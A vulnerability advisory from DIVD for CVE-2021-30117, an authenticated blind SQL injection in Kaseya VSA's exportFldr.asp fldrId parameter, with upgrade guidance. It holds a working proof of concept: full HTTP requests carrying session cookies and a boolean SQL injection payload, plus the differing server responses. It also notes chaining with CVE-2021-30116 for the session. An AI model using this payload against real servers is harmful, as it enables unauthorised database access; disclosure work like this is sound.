CVE-2021-30117 - Authenticated SQL injection in Kaseya VSA < v9.5.6
CVE | CVE-2021-30117 |
Case | DIVD-2021-00011 |
Discovered by | |
Credits |
|
Products |
Kaseya:
|
Versions |
Kaseya:
|
CVSS | Base score: 9.8 |
References | |
Solution | SaaS version has been fixed by the vendor Onpremise Upgrade the server to version 9.5.6 or above Upgrade the agent to version 9.5.0.23 or above |
Last modified | 20 Jun 2022 09:35 |
Description
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.
Detailed description
Given the following request:
GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;
Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure.
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 19:12:11 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 881
<!DOCTYPE html>
<HTML>
<HEAD>
<title>Whoops.</title>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link>
----SNIP----
However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed.
Request:
GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;
Response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 17:33:53 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 7960
<html>
<head>
<title>Export Folder</title>
<style>
------ SNIP -----
JSON version